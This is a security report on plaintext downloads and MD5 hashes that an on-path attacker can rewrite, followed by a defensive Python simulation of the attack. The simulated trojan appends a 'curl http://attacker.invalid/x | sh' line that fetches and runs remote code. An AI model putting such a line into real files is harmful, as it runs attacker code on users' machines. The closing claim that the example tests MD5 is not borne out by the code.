Downloads and updates transmitted insecurely
The download page and the rsync update tool both transmit data over unencrypted connections. An on-path attacker can inject malicious code into the download and, because the MD5 hash is served over the same unauthenticated channel, rewrite that hash to match the tampered file so the modification goes unnoticed.
For new downloads, the simplest solution would probably be to put the download page behind TLS and start using SHA-2 instead of MD5. I'm not sure what the "proper" fix for the rsync update tool is, though.
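The following is an added example, not code from the original report or from the project it describes. It simulates the failure mode above offline: a client that takes the published hash from the same unencrypted channel as the download learns nothing from checking it, because the attacker rewrites both, whereas a client that obtains the digest over an authenticated channel (TLS, or a value pinned out of band) rejects the tampered file. The release payload, the attacker's appended line and the pinned digest are constructed for the example.

```python
import hashlib
import hmac
from typing import Tuple

# Constructed sample release, standing in for the real download.
GOOD_RELEASE = b"#!/bin/sh\necho installing release 1.0\n"
# What the TLS-served (or out-of-band) download page would publish.
PINNED_SHA256 = hashlib.sha256(GOOD_RELEASE).hexdigest()


def verify_download(payload: bytes, expected_hex: str, algo: str = "sha256") -> bool:
    """Return True if payload hashes to expected_hex under the given algorithm.

    hmac.compare_digest avoids leaking where the comparison diverges.
    """
    digest = hashlib.new(algo, payload).hexdigest()
    return hmac.compare_digest(digest, expected_hex.lower())


def plaintext_mitm(payload: bytes, algo: str = "sha256") -> Tuple[bytes, str]:
    """Simulate an on-path attacker on an unencrypted connection.

    The attacker substitutes the payload and rewrites the advertised hash so
    the tampered file and the published digest stay consistent. Works the
    same whether the site publishes MD5 or SHA-2: the algorithm is not the
    weakness here, the unauthenticated channel is.
    """
    trojan = payload + b"curl http://attacker.invalid/x | sh\n"  # constructed
    return trojan, hashlib.new(algo, trojan).hexdigest()


def client_trusting_same_channel(payload: bytes, advertised_hex: str) -> bool:
    """Client that reads file and hash from the same plaintext download page."""
    return verify_download(payload, advertised_hex)


def client_with_authenticated_hash(payload: bytes) -> bool:
    """Client that takes the digest from an authenticated source (TLS page or
    a pinned value shipped with the installer), independent of the download."""
    return verify_download(payload, PINNED_SHA256)


def is_acceptable_algorithm(algo: str) -> bool:
    """Reject MD5 and SHA-1 for release integrity; accept the SHA-2 family."""
    return algo.lower() in {"sha256", "sha384", "sha512"}


if __name__ == "__main__":
    tampered, rewritten_hash = plaintext_mitm(GOOD_RELEASE)
    print("same-channel hash check passes on tampered file:",
          client_trusting_same_channel(tampered, rewritten_hash))
    print("authenticated hash check passes on tampered file:",
          client_with_authenticated_hash(tampered))
```

Switching from MD5 to SHA-256 only helps once the digest itself can no longer be rewritten by the attacker; the example passes `algo="md5"` and `algo="sha256"` through the same attack to make that explicit.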